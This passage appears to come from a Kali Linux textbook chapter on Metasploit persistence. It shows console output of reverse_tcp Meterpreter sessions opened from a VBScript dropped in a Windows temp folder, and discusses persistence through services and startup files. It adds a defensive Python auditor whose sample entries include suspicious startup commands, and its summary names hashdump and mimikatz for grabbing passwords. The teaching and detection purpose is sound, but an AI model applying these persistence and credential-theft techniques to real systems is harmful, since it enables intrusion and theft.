Learning Kali Linux





\WINDOWS\TEMP\oONsSTNbNzV.vbs
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\WINDOWS\TEMP\oONsSTNbNzV.vbs
[+] Agent executed with PID 3864
meterpreter > [*] Meterpreter session 2 opened (192.168.86.30:4444 -> 192.168.86.57:1046) at 2018-02-12 07:14:03 -0700
[*] Meterpreter session 3 opened (192.168.86.30:4444 -> 192.168.86.47:33214) at 2018-02-12 07:14:07 -0700
[*] 192.168.86.47 - Meterpreter session 3 closed. Reason: Died
Background session 1? [y/N]
msf exploit(windows/smb/ms08_067_netapi) > sessions

Active sessions
===============

  Id  Name  Type                     Information                          Connection
  --  ----  ----                     -----------                          ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ SYSTEM-C765F2  192.168.86.30:4444 -> 192.168.86.57:1045 (192.168.86.57)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ SYSTEM-C765F2  192.168.86.30:4444 -> 192.168.86.57:1046 (192.168.86.57)

Maintaining Access | 201

You will notice that I didn't set any of the options mentioned, even though I could have. Instead, I let the module choose the best method by using -A as a parameter. This left us with a new Meterpreter session, shown by running sessions. You'll also note that the persistence was created using a Visual Basic script, as seen by the file extension (.vbs). The one thing we don't know from looking at this output is whether the script will run when the user logs in or when the system boots. Either way, we need to make sure we have a handler waiting to receive the connection attempt when the payload starts. This module used exploit/multi/handler to receive the connection. Because the local IP address is embedded into the payload, you'll need to make sure the handler is always running on the system you created it on, with the same IP address, each time.
You now have two pathways to persistence. There are others that you can do manually. This may be particularly necessary if you are compromising a Linux or macOS system. You will need to determine the system initialization process (systemd versus init) and create a system service. Otherwise, you could start up a process in one of the startup files associated with a particular user. Some of this may depend on what level of permissions you had when you compromised the system.
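The two persistence routes described above leave the same kind of trace on a host: an autostart entry whose target lives somewhere a low-privileged process could have written it (the .vbs in C:\WINDOWS\TEMP in the console output, a service unit or user startup file on Linux or macOS). The following is an added example, not code from the book or from Metasploit, that audits a list of already-collected autostart entries for exactly that pattern. Everything in the sample list is constructed for the demonstration (the registry value name "Updater", the user "alice", the unit file, cron job and profile line); only the .vbs path is taken from the output shown on this page.

```python
"""Audit autostart entries for persistence that runs from disposable locations.

Added example, not code from the book or from Metasploit. Takes autostart
entries already collected from a host (Run keys, systemd ExecStart lines,
cron @reboot jobs, shell profile lines) and flags those that launch a script
or binary from a temporary or user-writable directory. Sample data is
constructed; see SAMPLE_ENTRIES.
"""
import re
from dataclasses import dataclass, field


@dataclass
class AutostartEntry:
    source: str   # where the entry lives: registry value, unit file, crontab, profile
    command: str  # the command line that runs at boot or logon


@dataclass
class Finding:
    source: str
    path: str
    reasons: list = field(default_factory=list)


# Directories an unprivileged user (or a process running as one) can write to.
WINDOWS_WRITABLE = (
    r"[a-z]:\\windows\\temp\\",
    r"[a-z]:\\temp\\",
    r"[a-z]:\\programdata\\",
    r"[a-z]:\\users\\[^\\]+\\",   # anything under a user profile, AppData included
)
UNIX_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

# Script types that need a script host (wscript/cscript, powershell, mshta) to run.
SCRIPT_EXTENSIONS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1", ".hta", ".bat", ".cmd")

# Candidate paths inside a command line: a quoted or bare Windows path, or an
# absolute Unix path with at least two components (so a "/background" switch is skipped).
WIN_PATH = re.compile(r'"([A-Za-z]:\\[^"]+)"|([A-Za-z]:\\[^\s"\']+)')
NIX_PATH = re.compile(r'(?<![\w/.])(/[A-Za-z.][^\s"\';&|>]*/[^\s"\';&|>]+)')


def extract_paths(command: str) -> list:
    """Return every file path that appears in a command line."""
    paths = [m.group(1) or m.group(2) for m in WIN_PATH.finditer(command)]
    paths += [m.group(1) for m in NIX_PATH.finditer(command)]
    return paths


def is_user_writable(path: str) -> bool:
    """True if the path sits in a directory a non-admin user could have written to."""
    if re.match(r"[A-Za-z]:\\", path):
        low = path.lower()
        return any(re.match(pat, low) for pat in WINDOWS_WRITABLE)
    return any(path.startswith(prefix) for prefix in UNIX_WRITABLE)


def audit_autostart(entries: list) -> list:
    """Flag entries whose target is in a writable location or is a script file."""
    findings = []
    for entry in entries:
        for path in extract_paths(entry.command):
            reasons = []
            if is_user_writable(path):
                reasons.append("runs from a user-writable directory")
            if path.lower().endswith(SCRIPT_EXTENSIONS):
                reasons.append("script file launched at startup")
            if reasons:
                findings.append(Finding(entry.source, path, reasons))
    return findings


# Constructed sample: the registry value name, the Linux unit, cron job, profile
# line and user name are made up; the .vbs path is the one from the console output.
SAMPLE_ENTRIES = [
    AutostartEntry(r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
                   r"wscript.exe //B C:\WINDOWS\TEMP\oONsSTNbNzV.vbs"),
    AutostartEntry(r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
                   r"C:\Windows\System32\SecurityHealthSystray.exe"),
    AutostartEntry(r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
                   r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    AutostartEntry("systemd:/etc/systemd/system/update-check.service",
                   "ExecStart=/tmp/.x/agent --quiet"),
    AutostartEntry("systemd:/usr/lib/systemd/system/sshd.service",
                   "ExecStart=/usr/sbin/sshd -D"),
    AutostartEntry("cron:root", "@reboot /bin/sh /dev/shm/.s >/dev/null 2>&1"),
    AutostartEntry("/home/alice/.bashrc", "nohup /home/alice/.cache/.run &"),
]


if __name__ == "__main__":
    for f in audit_autostart(SAMPLE_ENTRIES):
        print(f"{f.source}\n    {f.path}: {'; '.join(f.reasons)}")
```

The output is a triage list, not a verdict: the OneDrive entry is flagged because legitimate per-user software also installs under AppData, so in practice the writable-location rule is paired with an allowlist of signed vendor paths. The .vbs entry is the one that matches the page's scenario on both counts, a script file and a temp directory. The book's caveat that the handler must keep the same IP address gives the other half of the picture for a defender: the dropped script will try the same address and port at every logon or boot, so a repeated outbound connection from a script host to a fixed port (4444 in the output above) is the network-side counterpart of this host-side check.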
Summary
While Metasploit is an exploit development framework, it has a lot of built-in capability as well. You can do a lot from inside Metasploit without having to use external tools. It can take some time to get used to everything that is available in Metasploit, but the time invested is worth it. Here are some key ideas to take away from this chapter:
• Metasploit has modules that can be used to scan for targets, though you can also call nmap directly from Metasploit by using db_nmap.
• Metasploit maintains information about services, hosts, loot, and other artifacts in a database that can be queried.
• Metasploit modules can be used to scan and exploit systems, but you'll need to set targets and options.
• The Meterpreter shell can be used to interact with the exploited system by using OS-agnostic commands.
• Meterpreter's hashdump as well as the mimikatz module can be used to grab passwords.
• Meterpreter can be used to upload files, including programs to run on the remote system.
